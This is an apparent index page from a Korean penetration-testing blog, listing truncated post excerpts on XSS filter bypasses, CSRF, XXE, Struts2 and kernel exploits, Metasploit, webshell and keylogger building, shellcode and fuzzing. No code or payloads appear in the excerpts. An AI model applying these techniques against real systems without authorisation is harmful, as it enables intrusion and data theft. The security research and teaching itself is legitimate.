[WEB HACKING] Easily trigger event handler for XSS/ClickJacking" using CSS(or stylesheet)

Intro XSS는 영향력 대비 발견 가능성이 높은 취약점입니다. 또한 다른 Code base(Injection 등)의 취약점과 같이 연구하는 재미도 쏠쏠하고 사람에 따라 뚫을 수 있는 범위가 확실히 드러나는 취약점이기도 하죠. 오늘은 XSS나 ClickJacking의 영향력을 좀 더 강하게 발휘하는 방법에 대해 이야기할...

[HACKING] Analyzing BurpLoader.jar in Burp Suite Pro Crack(Larry Lau version) Part2

지난번 포스팅에 이이서 BurpLoader.jar에 대한 분석 내용으로 이어갑니다. Analysis BurpLoader.jar Part 1 ### http://www.hahwul.com/2017/06/hacking-analyzing-burploaderjar-in-burp.html Analysis BurpLoader.j...

[HACKING] Symbolic Execution(symbolic evaluation)을 이용한 취약점 분석

이번 포스팅은 Symbolic Execution 정리차원으로 글 작성해봅니다. Symbolic Execution은 포통 취약점 분석에 많이 사용되는 방법 중 하나이머, 이 기법으로 굉장히 많은 노가다가 단축되어 간단한 분석에서 엄청난 효율을 자랑합니다. Concrete Execution과 Symbolic Executi...

Bypass XSS filter with back-tick(JS Template Literal String)

오랜만에(?) XSS 우회기법 정리 차 포스팅 작성합니다. 오늘은 Template literal String인 back-tick과 이를 이용한 XSS에 대해 이야기할까 합니다. 자 그럼 시작하도록 하죠. Template literal string? Template Literal은 embedded expression을 허용하...

[WEB HACKING] SWF Debugging with ffdec(jpexs)

저는 swf 분석에선 ffdec를 사용합니다. 다만 최근에 처음 안 사실이.. jpexs랑 ffdec를 같은거더군요.(관심이 없었..) 아무튼 요즘 swf 취약점쪽으로 툴도 만드는겸 분석 방법에 대해 정리해둘까 합니다. (오늘은 디버깅이군요!) ffdec 설치는.. https://www.hahwul.com/2015/03/...

[WEB HACKING] SWF(Flash) Vulnerability Analysis Techniques

오늘은 SWF내 취약점 분석에 대한 이야기를 할까합니다. SWF가 많이 적용된 환경은 가끔식 보는지라.. 오랜만에 분석하려하면 까먹고 기억 안나는 것들이 있습니다. 두고두고 볼 겸 포스팅으로 작성합니다. SWF, 즉 플래시 파일은 대체로 간단한 영상(?) 재생이나 게임 제작등에 쓰이죠. 이 Flash는 ActionSc...

[METASPLOIT] msfconsole 내 Prompt 설정하기

msf 사용 중 간단한 편의 기능에 대한 이야기를 할까합니다. 바로 Prompt 부분에 대해 설정하는 방법인데요. 초기 저는 이 방법이 있을거란 생각도 안하고 코드에서 직접 바꿔서 썼었던 기억이 나네요. (물론 그것도 나름의 장점이!) 먼저 msfconsole을 열어줍니다. 쉘이 떴다면.. 아래와 같이 setg 명령을 이용...

OOXML XXE Vulnerability (Exploiting XXE In file upload Function!)

오늘은 BlackHat USA 2015에서 공개된 OOXML XXE 기법에 대해 정리할까 합니다. 나온지 조금됬지만.. 아직도 잘쓰이기에 한번쯤 정리하면 좋을거라 생각했었죠. 어찌보면 다른 XXE(PDF,Image,Basic)와 원리로는 크게 다르지 않을 수 있지만 조금 더 생소한 환경에서의 XXE라 매력적입니다. 그럼 시...

[DEBIAN] Thunder Bird에서 Anigmail, GnuPG(gpg)를 통한 이메일 암호화

오늘은 암호화된 메일 통신을 위해 GPG를 이용한 키생성과 Thunder Bird에 연동하는 과정을 이야기할까 합니다. 일반적으로 쓰는 메일 서비스들이 암호화되어 안전하게 전송된다고는 하지만 우리는 신뢰할 수 없기 때문에 종단 간 암호화로 더 튼튼한 이메일을 사용하죠. 그럼 안전한 메일 사용을 위한 이메일 암호화에 대해 알...

Parameter Padding for Attack a JSON CSRF

좀 오래된 우회기법(?)이긴 하나 한번 정리해두면 좋을 것 같아 포스팅합니다. 오늘은 CSRF 그중에서도 JSON 형태의 요청을 처리하는데 사용할 수 있는 방법이죠. 많은 수의 CSRF는 GET 형태의 경우 <img> 태그 활용, POST 형태의 경우 <form> 태크나 Jquery, XML Reque...

[HACKING] Eternalblue vulnerability&exploit and msf code

지난주 쯤인가요..? Shadow Brokers 가 공개한 Eternal 시리즈의 취약점을 주제로 포스팅을 할까 했습니다만.. 이번 주말에 관련해서 이슈가 터져버렸네요. (정신없는 사이 벌써 한주가 지났네요..헣) WanaCrypt0r 랜섬웨어도 사용하고 있는 Eternalblue에 대해 조금 알아볼까 합니다. W...

[EXPLOIT] Linux Kernel - Packet Socket Local root Privilege Escalation(CVE-2017-7308,out-of-bound) 분석

정말 오랜만에 포스팅을 하네요. 최근에 공개된 Linux kenel 취약점에 대한 분석 내용으로 준비하였습니다. (예전에 Kernel OOB 취약점 써둔건 어디갔는지 모르겠네요.. 설마 지운건가? =_=) Socket을 생성하고 사용하는 중에 out-of-bound가 일어나고, 이를 통해 권한상승까지 가능한 취약점이죠...

Form action + data:를 이용한 XSS Filtering 우회 기법

XSS 테스트 시 재미난걸 하나 찾은겸 블로그에 정리할까 합니다. 먼저 테스트하던 구간은 여러가지 규칙이 있었습니다. 문자열 기번의 필터링으로 사용할 수 있는 태그가 한정되어있고, 이벤트 핸들러 또한 거의 전부 필터링되었죠. 그리고.. 결정적으로 base, java , script 등 문자열 필터링으로 우회 구문 작성하는데 ...

Apache Struts2 RCE Vulnerability(CVE-2017-5638/S2-045)

올해도 어김없이 Apache Struts2 관련 취약점이 공개되었습니다. 요즘 DCCP Double free 취약점을 천천히 보고있는 상황인데 급히 Struts 정리해서 포스팅하게 되네요. 현재 CVE-2017-5638, S2-045로 올라와 있습니다. Vulnerable Version Apache Struts 2.3...

Bypass XSS Blank filtering with Forward Slash

XSS 테스팅 시 가끔씩 발목을 잡는 친구가 있습니다. 바로 Blank 필터링인데요. 태그 사용이 제한된 상황에선 굉장히 짜증나는 존재죠. (다된 것 같은데..output이 안나오는 상황) 오늘은 이 Blank 필터링을 우회하는 간단한 트릭을 이야기할까 합니다. Blank Filtering? 먼저 간략하게 Blank Fi...

[METASPLOIT] Hardware pentest using metasploit - Hardware-Bridge

최근 Rapid7사에서 재미있는 내용을 발표했었습니다. 바로 Metasploit Framework의 Hardware-Bridge 기능입니다. 이로써 Metasploit은 소프트웨어와 하드웨어 모두 공격이 가능한 프레임워크가 되었네요. 아래 구글그룹스 내용과 공식 포스팅을 보시면 관련 내용이 있습니다. https://gro...

[HACKING] Lavabit&Magma - Encrypted Email Service (Dark Mail Alliance)

Lavabit이 돌아오다! 올 1월 20일 재미있는 소식이 하나 들려왔습니다. 바로 Lavabit의 재개 소식입니다. 2013년 Edward Snowden 사건(?)으로 인해 잠시 운영을 중단한 암호화 메일 서비스입니다. 아무래도 큰 이...

[HACKING] Microsoft Windows Kernel Win32k.sys Local Privilege Escalation Vulnerability 분석(CVE-2016-7255/MS16-135)

오랜만에 취약점 분석을 하는 것 같습니다. 오늘은 작년에 발표되고 올해 공격코드가 공개된 Windows kenel Win32k.sys Local Privilege Escalation에 대해 보도록하겠습니다. 간략하게 정리하고 시작하겠습니다. CVE-NUMBER: CVE-2016-7255 CVSSv3: 7.6 Mic...

[WEB HACKING] PHP Comparison Operators Vulnerability for Password Cracking

개인적으로 프로그래밍의 재미있는 요소는 연산자가 아닐까 싶습니다. 작은 연산자들이 모여 큰 흐름을 만들고, 우리같은 해커는 이 흐름을 틀어 예상치도 못한 행위를 이끌어내니 굉장히 재미있는 부분이죠. PHP에는 아주 재미있는 취약점이 하나 있습니다. 간단한 버그일 수 있지만 이 결과가 엄청난 데이터를 불러올 수 있죠. 오늘은...

정규표현식을 이용한 XSS 우회 기법

⚠️ XSS에 대한 전반적인 내용은 Cullinan > XSS 페이지에서 관리하고 있습니다. 해당 페이지에서 최신 데이터가 유지되니 참고 부탁드려요 :D 대부분 Reflected XSS가 발생하는 포인트는 비슷비슷합니다. 사용자 입력값에서부터 출발하기 때문에 입력이 노출되는 구간, 그 중에서 공격에 쓰이는 특수...

HTML AccessKey and Hidden XSS (Trigger AccessKey and Hidden XSS)

예전에 hidden xss 관련해서 포스팅한적이 있습니다. input 내 hidden 속성을 가질 시 일반적으로 xss가 어렵지만, 조건에 따라 동작이 가능한 XSS도 있지요. 이 기법에서 사용되는 accesskey 에 대한 이야기를 할까 합니다. HTML AccessKey 먼저 AccessKey는 HTML내 단축키를 이용...

SOP(Same-Origin Policy)와 Web Security

오늘은 웹 해킹 시 우리의 발목을 잡는 친구인 SOP(Same-Origin Policy)에 대한 이야기를 하려고 합니다. Same-Origin Policy? Same-Origin Policy(동일 출처 정책)는 웹 사이트간 정보 교류에 제한을 두는 정책입니다. 당연히 보안적이 문제로 인해 만들어진 정책으로 MDN에선 아래와...

postMessage를 이용한 XSS와 Info Leak

지난주 Exploit-db에서 뒤적뒤적 하던 중 PostMessage 재미있는 관련 문서를 보게되었습니다. 바로 postmessage에서 발생하는 취약점을 찾는 방법입니다. 오늘은 이 postmessage를 이용한 XSS 방법들에 대해 좀 더 테스트해본 결과를 공유할까 합니다. Thank you so much Gary...

BurpSuite의 단축키(Hotkey) 소개 및 변경하기

개인적으로 웹 해킹 시 주력으로 사용하는 툴은 Burpsuite 입니다. 아 물론 최근 ZAP(OWASP Zed Attack Proxy)를 사용해봤는데 굉장히 좋더군요. 그래도 손에 익은 단축키와 저에게 맞는 UI로 저는 Burp의 손을 들어주고 싶네요. 오늘은 Burpsuite의 단축키에 대해 정리할까 합니다. 물론 툴에...

[CODING] WebSocket - Overview , Protocol/API and Security

WebSocket이란? WebSocket은 웹 페이지에서 실시간으로 동작하는 웹 서비스를 만들어 줄 수 있는 표준 기술입니다. 일반적으로 웹 프로토콜인 HTTP는 Request와 Response 기반으로 새로 요청이 발생하면 페이지를 다시 그려야하는 구조입니다. 덕분에 쿠키라는 개념도 사용되게 되었지요. (인증 정보를 유지하...

[HACKING] Mobile Application Vulnerability Research Guide(OWASP Mobile Security Project)

오늘은 간만에 모바일 보안, 즉 스마트폰에 대한 이야기를 하려합니다. (요즘 바빠서 글 쓸 시간이 없네요.. ) 올해 OWASP는 Mobile Security Project로 Mobile Application Security Guide, 즉 취약점 점검, 모의해킹, 보안을 위한 체크리스트를 공개했습니다. 내용을 보시면 아...

Meterpreter Railgun! 공격하고 확장하자 🦹🏼

오늘은 Metasploit 의 강력한 쉘인 Meterpreter shell 중 Railgun과 IRB를 이용한 API 사용에 대한 내용을 준비했습니다. 쉬운 이해를 위해서 API Call 먼저보고 RailGun 순서로 진행됩니다. Meterpreter를 아주 강력하게 만들어주는 RailGun, 편리한 공격을 위한 IRB A...

[HACKING] BlackArch Linux Install, Review (Arch linux for Pentest)

이번에 가상머신 정리좀 할 겸 최근에 이야기 나왔던 BlackArch를 설치해봤습니다. 개인적으로 Arch Linux를 써본적이 없기 때문에(딱 한번 설치만 해봤던거 같네요) 기대감을 지닌 채 구성을 하였습니다. 이번 포스팅에선 BlackArch Linux에 대한 전반적인 Review로 진행하려 합니다. Arch Linu...

Paranoid Mode! SSL Certified Meterpreter shell

지속적인 모의해킹은 인프라, 서비스의 보안성을 향상 시키는데 큰 도움이 됩니다. 다만 뒷처리가 깔끔하지 않다면 더 취약해질 수도 있다는 문제점을 가지고 있죠. 오늘은 조금 더 안전한 Pentest를 위해서 공격에 사용되는 Shell의 payload 정보를 암호화하고 안전하게 pentest를 하기 위한 장치에 대해 알아볼까 ...

[EXPLOIT] GNU Wget 1.18 Arbitrary File Upload/Remote Code Execution 분석(Analysis)

오랜만에 Exploit 코드 분석을 해볼까합니다. (한참된거 같네요) 최근 wget, 즉 gnu wget에서 Arbitrary File Upload와 Remote Code Execution 취약점이 발견되었습니다. 딱봐도 파급력이 크기 때문에 당연 CVE도 붙었고 CVSS Risk level 도 높을 것으로 보이네요. 그럼 ...

PUT/DELETE CSRF(Cross-site Request Forgrey) Attack

오늘은 웹 해킹 기법 중 핫한 CSRF에 대한 이야기를 좀 할까합니다. XSS와 함께 정말 자주 잡게되는 취약점이고 사용 방향에 따라 영향력도 높을 수도 있는 멋진 친구이지요. 오늘은 아주 희소하지만 PUT/DELETE 등 GET/POST가 아닌 CSRF에 대한 이야기를 할까 합니다. Why? 이미 Title에서도 보셨겠지...

HIDDEN:XSS - input type=hidden 에서의 XSS

웹 취약점 진단에서 가장 만만하면서 가장 어려울때도 있는 XSS에 대한 이야기를 할까합니다. 그 중에서도 오늘은 hidden XSS. 즉 hidden 속성을 가진 태그에 대한 xss입니다. 앞서 간단하게 hidden 속성, 왜 hidden이 우회하기 힘든지 설명하고 각각 우회 방법에 대해 이야기해보죠. 읽으시기 전에 편한 ...

XSS를 위한 간단한 Keylogger 만들기!

오늘은 공격을 통한 영향력 측면에서 바로 사용자의 키 입력을 가로채는 Keylogger를 간단하게 만들어볼까합니다. 물론 악용하시면 안됩니다. 연구적인 측면에서 해보시길 바랍니다. Keylogger의 원리 전통적인 Keylogger는 OS나 사용자 프로그램에 삽입되어 사용자가 입력하는 키 값을 후킹하여 가로채 PC에 저장하...

[HACKING] JDWP(Java Debug Wire Protocol) Remote Code Execution

오늘은 JDWP에 대한 RCE 취약점에 대해 이야기할까 합니다. 이 취약점은 2014년도 나온 취약점이지만 최근에도 몇번 만난적이 있어 정리해둘까하네요. JDWP?? JDWP는 JPDA, 즉 Java Platform Debugger Architecture 중 하나로써 Debugger와 JVM(Java Virtual Mach...

Anti-XSS Filter Evasion of XSS

웹 해킹 시 가장 많이 잡는 취약점 중 하나가 XSS와 URL Redirection입니다. 항상 하다보면 꼭! 스크립트로 들어갈 수 있으나 함수 및 특정 특수문자 필터링에 막히는 경우가 종종 있죠. 그래도 여러분들께 재미있는 우회 기법 몇개 공유해드리면 좋을 것 같아서 작성해봅니다. Default XSS TAG + ...

[WEB HACKING] Reflected File Download(RFD) Attack

요즘 정신없이 보내다보니 간만에 글을 쓰게 되네요. 오늘은 BlackHat 2014에서 Hot했던 RFD에 대한 이야기를 하려합니다. (벌써 2년이나 지났네요 ㅎㅎ..) BlackHat 2014 Europe 에서 발표된 이 내용은 RFD, New Web Attack이란 아젠다고 진행되었고 신뢰할 수 있는 도메인에서 파일을 ...

[WEB HACKING] XDE(XSS DOM-base Evasion) Attack

여러가지 테스트를 하다보니 재미있는 것을 하나 찾아서 작성합니다. 물론 XXN 처럼 신박한 방법은 아니지만 아주 간단하며, 알고있다면 XSS 필터링에 대한 우회 기법으로 사용할 수 있을 것 같네요. 기존에 DOM Base XSS처럼 DOM을 이용한 XSS이지만 잘 활용하면 XSS를 방지하기 위해 만든 Filter에 대해 ...

[WEB HACKING] SWF내 DEBUG Password Crack 하기(Cracking DEBUG password in SWF flash file / EnableDebugger2)

예전에 미리 작성해놓고.. 한참 바쁘다가 이제서야 올리게됬네요. 오늘은 플래시 파일. 즉 SWF안에 있는 enableDebugger에 대해 알아보고, Key를 크랙하는 법에 대해 볼까합니다. 왜 SWF 내 DEBUG Password를 Crack 할까? 이 보안 취약점은 아주 간단한 취약점입니다. 또한 영향력도 낮지요… 그러...

[WEB HACKING] DotDotPwn - The Path Traversal Fuzzer(DDP를 이용한 Path Traversal)

Path Traversal , Directory Traversal을 좀 더 쉽게 테스팅할 수 있는 Traversal 전용 Fuzzer - DotDotPwn에 대한 내용으로 진행할까 합니다. 이 툴은 현재 Kali Project에도 속해있을 정도로 유명하고 잘 사용되는 툴 입니다. 잘 익혀두면 정말 필요할 때 알맞게 사용하실 ...

[WEB HACKING] Apache Struts2 DMI REC(Remote Command Executeion) Vulnerability(CVE-2016-3081)

지난 CVE-2016-0785 취약점에 이어 CVE-2016-3081 Struts2 취약점에 대해 정리할까합니다. 일단 Struts2 취약점은 예전부터 아주 치명적인 취약점으로 알려졌었고, 최근에 또 줄줄이 나타나고 있습니다. 올 초부터 발생한 Sturts2 취약점들은 약간 비슷한 형태의 구성을 가지고 있습니다. 그 중 최...

Apache Struts2 REC Vulnerability (CVE-2016-0785)

최근 Apache Struts2에 Remote Command Execution 취약점이 하나 올라왔습니다. 이전에도 굉장히 이슈가 많았던 Struts 취약점은 Struts2를 사용하는 Apache에서 취약할 수 있으며 원격 명령이 실행되어 서버 권한을 탈취할 수 있기 때문에 굉장히 위험하죠. CVE-2016-3081 이슈도...

[HACKING] OpenSSL Client 에서 SSLv2 사용하기(Check DROWN Attack)

OpenSSL, Python 내 ssl 패키지도 어느시점부터 SSLv2 사용에 대해 지원을 중단하고 사용하지 못하도록 패치되었습니다. 올 초에 이슈가 되었던 DROWN Attack에 대해서 점검하기 위해서는 SSLv2 를 사용하여 서버에 접근해야하지만, 기존에 사용하던 OpenSSL은 -ssl2 옵션을 사용하지 못합니다. 그...

[HACKING] SSLv2 DROWN Attack(CVE-2016-0800) 취약점 분석 / 대응방안

올 초에 발견되었던 DROWN Attack에 대해 이야기해볼까 합니다. 사실 발견 당시 이 취약점에 대해 굉장히 흥미가 생겼지만, 바쁜 일정과 적은 자료로 관심을 접게되었지요. 최근에 a2sv에 해당 취약점을 점검할 수 있는 모듈을 넣는게 좋다고 생각되어서 다시 열어보게 되었습니다. ...

NMAP Part2 - NSE(Nmap Script Engine)을 이용한 취약점 스캐닝

Nmap script 인 NSE는 nmap을 통해 네트워크 스캔을 진행하거나, 취약점 진단을 수행할 때 유용하게 쓰일 수 있는 스크립트입니다. Lua로 작성되어 있으며 nmap을 통해 포트스캔, 네트워크 접근 이외에도 더 넓은 범위의 테스트를 지원합니다. 오늘은 NSE에 대한 이야기를 하려고 합니다. NSE(Nmap Scr...

nmap을 이용한 여러가지 네트워크 스캔 기법 살펴보기

네트워크를 스캔할 수 있는 도구는 여러가지가 있습니다. 그 중 가장 유명하고 대표적인 nmap에 대한 내용을 정리하려고 합니다. nmap 은 네트워크, 해킹, 보안쪽 하시는 분이라면 사용하시고 있겠죠. 물론 개발쪽에서도 사용하기도 하죠. 저희 경우에는 nmap 자체를 많이 활용하지는 않습니다. 대체로 손에 익은 옵션들만 사...

Arachni - Web application security scanner framework

많은 WVS(Web Vulnerability Scanner) 중 오픈소스 프레임워크인 Arachni에 대한 이야기를 할까합니다. 간단하게 테스트 하였고, 무난하게 사용할 수 있을 것 같아 정리합니다. Installation Download(https://www.arachni-scanner.com/download/) ...

MSF의 local_exploit_suggester 모듈을 이용한 Local Exploit 찾기

Metasploit을 통해 대상 시스템에 침투했을 경우 우리는 권한 상승을 위해 Local 취약점을 찾기 위해 노력할 것입니다. 물론 취약한 어플리케이션이 눈에 잘 띄지는 않지만요. Meterpreter Shell에서 사용가능한 모듈 중 이러한 과정을 자동화해준 모듈이 있습니다. 바로 local_exploit_suggeste...

[HACKING] steghide를 이용한 Steganography(Embed/Extract Steganography with steghide)

Steganography와 steghide Steganography Steganography (US Listeni/ˌstɛ.ɡəˈnɔː.ɡrə.fi/, UK /ˌstɛɡ.əˈnɒɡ.rə.fi/) is the practice of concealing a file, message, image, or video within ano...

[METASPLOIT] Default Shell을 Meterpreter Shell로 업그레이드하기(Nomal Shell to Meterpreter shell)

Metasploit 모듈 중 shell_to_meterpreter라는 POST 모듈이 있습니다. 이 모듈을 이용해서 reverse_tcp, bind_tcp 등 일반 쉘을 meterpreter shell로 업그레이드 할 수 있습니다. shell_to_meterpreter Options 일단 해당 POST 모듈 사용을 위해 ...

SQLNinja를 이용한 SQL Injection 테스팅

SQL NINJA란? SqlMap과 함께 SQL Injection Testing 도구로 유명한 툴입니다. perl 기반으로 제작되었으며, Kali Default Tool에도 포함될 만큼 좋은 성능을 자랑하지요. SqlMap과 많이 비교되긴 합니다만 장점을 뽑자면 연동성과 Reverse Shell과 같이 바로 강력한 영향력을...

[SYSTEM HACKING] Remote NFS Mount 및 Metasploit nfs/nfsmount 모듈을 이용한 NFS Scan/Access

Mount 명령을 이용한 Remote NFS Mount Linux, Unix 등에서 HDD,USB 등을 사용하기 위해서는 mount를 통해 OS와 해당 드라이브를 연결시켜주는 작업이 필요합니다. 랩톱에서 사용하는 Linux는 기본적으로 드라이브 연결 시 자동으로 mount 하는 기능을 가지고 있지요. 오늘은 이 mount ...

[SYSTEM HACKING] RPC Port Map Dump를 이용한 서비스 Port 확인

System에 오픈되어 있는 Port 를 확인하는 방법에는 여러가지가 있습니다. 대표적으로 port 에 대해 직접 요청하여 확인하는 방법(Syn Scan, XMAS 등등)이 있지요. nmap을 통해 서비스에 있는 포트들에 대해 확인하게 되는데 이 중 rpc 관련 포트가 있다면 좀 더 세심하게 스캔이 가능합니다. 바로 RP...

A2SV(Auto Scanning to SSL Vulnerability) - SSL 취약점 점검 도구

a2sv는 deprecated 되었습니다. 훨씬 상위 호환인 testssl.sh를 이용해주세요! 하나의 시스템에 대해 긴 시간을 분석한다면 참 좋겠지만, 현실은 그렇지 않을 경우가 많습니다. 그렇기 때문에 빠르게 테스트가 필요한 것들은 Scanner와 같은 툴의 도움을 많이 받습니다. 오늘은 제가 분석을 위해 만들었...

[EXPLOIT] Android sensord Local Root Exploit 분석(Android Exploit Anlaysis)

최근 Android Local Root Exploit이 EDB에 올라와서 좀 관찰해봤습니다. EDB-ID: 39340CVE: N/AOSVDB-ID: N/A EDB Verified: Author: s0m3b0dyPublished: 2016-01-27 Download Exploit: Source RawDownload Vul...

[EXPLOIT] Linux Kernel REFCOUNT Overflow/UAF in Keyrings 취약점 분석

요즘 Linux Kernel 취약점이 간간히 많이 올라오는 것 같습니다 . 그 중 1월 9일 EDB를 통해 공개된 CVE-2016-0728 취약점에 대한 이야기입니다. 리눅스 전반적으로 영향력이 있어 파급력이 강한 취약점이네요. EDB-ID: 39277 CVE: 2016-0728 OSVDB-ID: N/A ED...

JWT(JSON Web Token) 인증방식과 보안테스팅, 취약점 분석

🚧 JWT 관련 테스팅, 보안 내용은 제 블로그 내 Cullinan 페이지에서 관리중입니다. Cullinan > JWT 항목을 참고해주세요. 요즘 인증 관련해서 OAuth가 많이 사용하면서 자연스레 JWT에 대한 이야기도 많아지고 있습니다. 테스트를 하다보니 개념만 알고있던 JWT에 대해 공부도 되고 보안적인 ...

[EXPLOIT] Linux Kernel Overlayfs - Local Privilege Escalation 취약점 분석

작년 6월쯤 overlayfs 관련 local root exploit 이 나와서 좀 관찰해봤던 기억이 납니다. 물론 포스팅에선 걍 소식만 전했었네요.. 최근 유사형태의 취약점으로 edb에 overlayfs 를 이용한 권한상승 취약점이 다시 올라오게 되었습니다. EDB-ID: 39230 CVE: 2015-8660 OS...

Java Applet을 이용한 공격 방법들

웹 취약점에 대한 분석 시 주요 태그로 알려진 것들은 대다수 필터링 되어 있지만 간혹 빠지는 태그들이 있습니다. 그 중 오늘은 applet 태그에 대한 이야기를 하려합니다. applet 태그는 웹에서 Java Applet을 이용하기 위해 object 태그와 함께 많이 사용되는 태그이죠. 이 applet 을 이용하여 다양한 ...

TOCTOU(Time-of-check Time-of-use) Race Condition

간만에 내용 정리할겸 Race Condition Attack에 대해 작성해볼까 합니다. 일단 Race Condition 기법은 이름 그대로 “경쟁조건” 을 의미하는 공격이고 취약한 프로그램이 사용하는 부분을 동일하게 점유하여 경쟁하고 반복적인 요청 중 공격프로그램이 이길 시 공격자가 원하는 흐름으로 프로그램의 로직을 바꿀수가...

MongoDB Injection으로 알아보는 NoSQL Injection

⚠️ NoSQL Injection에 대한 전반적인 내용은 Cullinan > NoSQL Injection 페이지에서 관리하고 있습니다. 해당 페이지에서 최신 데이터가 유지되니 참고 부탁드려요 :D 웹 취약점 분석에서 나름 많은 부분을 차지하는 Injection. 그 중 DB 관련한 NoSQL Injection에...

[WEB HACKING] XXN Attack(X-XSS-Nightmare) :: R-XSS Bypass Browser XSS Filter

작년 말 이 재미있는 XXN 공격에 대해 듣게되고 분석을 해보았었고 이제서야 글로 작성하게 되네요. 12월에 Masato Kinugawa가 공유한 기법입니다. 현재 CVE-2015-6144, CVE-2015-6176으로 CVE Number가 할당되어 있습니다. MS에서도 작년 12월에 패치를 진행했었네요. 이 공...

[SYSTEM HACKING] ShellNoob를 이용한 Shellcode 작성 및 활용 (Writing Shell Code with ShellNoob || Install and Using ShellNoob)

shellcode 를 만드는 일은 재미있지만, 생각보다 시간도 투자되고 약간 귀찮은 부분도 존재합니다. 그러한 과정을 조금 줄여줄 수 있는 좋은 툴이 있어 작성하였습니다. Shellnoob라는 이 툴은 Shellcode를 위한 툴 입니다. Assembly 코드를 쉘코드로 변환하거나 ShellCode 제작에 있어 굉장히 도움...

64bit Linux Execve Shell Code 만들기

오늘은 64비트 쉘코드에 대한 이야기를 할까 합니다. 예전에 이쪽 분야 관심을 가졌을 초반 쯤에 32bit에 대한 쉘코드를 만들고 사용했었지만 지금은 일 특성상 딱히 쉘코드를 사용할 일이 굉장히 적어졌기에 간만에 보는 느낌입니다. 일단 32bit나 64bit나 직접 assembly 코드를 짜거나, C에서 변환하는 식으로 하...

[EXPLOIT] Joomla 1.5 Object Injection & Remote Command Execution 코드 분석(Code Analysis)

EDB에는 꾸준히 몇개씩 Exploit code, zero day 등이 올라오는데 이번에 약간 파급력이 짙은 취약점이 공개되었습니다. 바빠서 신경을 못쓰고 있다가 확인해보니 많이 사용하는 프레임워크에 영향력까지 높아보여 차근차근 코드를 볼까합니다. Joomla 1.5 RCE 국내에서도 많이 쓰이고 있는 Joomla ...

[WEB HACKING] Weevely를 이용하여 Stealth Webshell 만들기(weevely 설치 및 사용)

Web Hacking 에서 가장 파급력이 강한 공격이라고 생각되는 웹쉘에 관한 이야기입니다. 보통 많이 알려진 r57등의 쉘을 사용하거나 one line shell을 사용하기 나름인데 찾다보니 좋은 툴이 있어 겸사겸사 작성하였습니다. Weevely라는 이 툴은 Web Shell Generator입니다. (저도 예전에 ...

Android Remote Shell/Debugging

앱 분석 도중 케이블 접지 문제로 USB를 통한 ADB 사용이 어려워져 Adb Remote 연결에 대한 부분을 찾아보았고 정리 차원에서 작성합니다. Use ADB Command 안드로이드 기기에서 쉘 접근 후 아래 명령을 통해 5555 포트를 adb 프로세스로 열어둡니다. adb tcpip 5555 이후 PC에서 해당...

Burp Suite를 통한 Android SSL Packet 분석(Android Proxy + SSL Certificate)

Android 분석 중 발생하는 패킷에 대해 분석할 때 대부분 tcpdump + wireshark 조합을 많이 사용하게 됩니다. 그 중 http 패킷에 대해서는 wireshark 보다 익숙한 burp가 좋기 때문에 프록시를 burp로 걸고 보는 경우가 많았지요. 그 중 burp에서 SSL 관련 패킷에 대해 확인이 안되어 좀...

HSTS(Http Strict Transport Security)와 보안/침투 테스트

웹 해킹을 진행 중 SSL이 결려있는 https 에 대한 침투테스트를 진행할 때가 있습니다. 대부분의 site 는 SSL(https)만 적용되어 Proxy를 통해 쉽게 테스트가 가능하지만 개인정보나 중요정보를 다루는 서버는 HSTS 기술이 적용되어 있습니다. 이 HSTS는 기존 HTTPS 보다 더 강화된 형태의 보안 정책이...

[SYSTEM HACKING] Peach Fuzzer의 GUI 모드 - Peach3 Fuzz Bang(Run Peach Fuzzer on GUI Interface)

찾다보니 Peach Fuzzer에 여러가지 기능 중 GUI 모드를 지원하는 기능이 있었습니다. 원래 Windows Base 로 만들어졌던 터라, ./peach 파일에 대해서만 신경썼지 다른건 좀 못보고 있었는데요. Peach Fuzzer 디렉토리 하단에 PeachFuzzBang.exe와 PeachValidator.ex...

[SYSTEM HACKING] Peach Fuzzer를 통해 Application 분석 2 - Application Fuzzing for Exploit

Peach Fuzzer를 이용한 프로그램 Fuzzing 에 대한 내용을 다룹니다. 설치 방법은 아래 포스팅 참고하셔서 진행하시면 됩니다. [SYSTEM HACKING] Peach Fuzzer를 통해 Application 분석 1 - Install Peach Fuzzer Peach Fuzzer는 여러 플랫폼을 공통으로 지원...

[SYSTEM HACKING] Peach Fuzzer를 통해 Application 분석 1 - Install Peach Fuzzer

취약점을 찾기 위해서 Fuzzing 이라는 반복적이고 재미없는 작업을 해야하는데, 이를 도와는 Fuzzer 들로 인해 좀 더 쉽게 취약 포인트를 찾아나갈 수 있습니다. 여러 Fuzzer 중 이번엔는 약간 큰 Peach Fuzzer(Fuzzing Framework)에 대한 이야기를 할까 합니다. Peach Fuzzer ...

[SYSTEM HACKING] Melkor ELF(Binary) Fuzzer 설치 및 사용법(Install and Usage)

예전부터 간간히 사용하던 Linux Base Fuzzer에 대한 이야기입니다. Melkor라는 이 Fuzzer는 Linux 시스템에서 EFL 파일에 대한 Fuzzing 을 위한 툴이고, 간단한 사용법에 성능도 괜찮은 편이라 공유드리네요. Melkor 설치하기(Install Melkor) Melkor는 github를 통...

[HACKING] APKInspector를 이용한 Android Malware 분석하기 2 - APKInspector를 이용한 Malware Analysis

[HACKING] APKInspector를 이용한 Android Malware 분석하기 1 - APKInspector 설치하기(Install APKInspector) [HACKING] APKInspector를 이용한 Android Malware 분석하기 2 - APKInspector를 이용한 Malware Analysis ...

[HACKING] APKInspector를 이용한 Android Malware 분석하기 1 - APKInspector 설치하기(Install APKInspector)

[HACKING] APKInspector를 이용한 Android Malware 분석하기 1 - APKInspector 설치하기(Install APKInspector) [HACKING] APKInspector를 이용한 Android Malware 분석하기 2 - APKInspector를 이용한 Malware Analysis ...

Binary 분석을 통해 어플리케이션에 포함된 숨겨진 데이터 찾아내기

일반적으로 PC Application 해킹에 대한 이야기는 리버싱으로 시작하여, 리버싱으로 끝나기 마련입니다. 대부분 디스어셈블러와 디버거를 이용하여 취약점을 분석하거나 내부 보안로직을 우회하는 등 프로그램에 대한 공격을 수행하게 됩니다. 다만 오늘은 리버싱에 대한 이야기 아니라 간단하게 Binary 파일 분석을 통해서 어...

[WEB HACKING] URL Redirection & URL Forwards 우회 기법(Bypass Redirection Filtering)

URL Redirection, URL Forwarding 이라고도 부르는 이 취약점(?) 공격 방법은 사용자로 하여금 의도하지 않은 페이지로 이동시키는 목적을 가지는 공격 방법입니다. 대게 로그인, 로그아웃부터 각종 페이지 이동 파라미터 등 XSS 와 비슷하게 웹 침투 시 많이 찾아낼 수 있는 취약점입니다. 페이지를 이동하...

[EXPLOIT] OpenSSL Alternative Chains Certificate Forgery (CVE-2015-1793) 취약점 분석

